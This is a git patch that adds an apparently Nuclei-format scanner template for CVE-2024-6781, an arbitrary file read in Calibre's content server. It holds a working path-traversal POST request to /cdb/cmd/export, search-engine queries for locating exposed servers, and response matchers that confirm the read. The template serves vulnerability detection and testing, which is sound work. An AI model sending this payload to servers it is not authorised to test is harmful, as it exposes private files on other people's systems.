From 5ae2718cb2be4502e77aa0ed7e4a718287121166 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 31 Jul 2024 21:59:28 +0530 Subject: [PATCH] Create CVE-2024-6781.yaml --- http/cves/2024/CVE-2024-6781.yaml | 41 +++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 http/cves/2024/CVE-2024-6781.yaml diff --git a/http/cves/2024/CVE-2024-6781.yaml b/http/cves/2024/CVE-2024-6781.yaml new file mode 100644 index 0000000000..4cb25e1136 --- /dev/null +++ b/http/cves/2024/CVE-2024-6781.yaml @@ -0,0 +1,41 @@ +id: CVE-2024-6781 + +info: + name: Calibre <= 7.14.0 Arbitrary File Read + author: DhiyaneshDK + severity: high + description: | + Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0. + reference: + - https://starlabs.sg/advisories/24/24-6781/ + metadata: + shodan-query: html:"Calibre" + fofa-query: "Server: calibre" + verified: true + max-requeset: 1 + tags: cve,cve2024,calibre,lfi + +http: + - raw: + - | + POST /cdb/cmd/export HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + ["extra_file", 1, "..\\..\\..\\Calibre Settings\\gui.json", ""] + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "application/json" + + - type: word + part: body + words: + - "label" + + - type: status + status: + - 200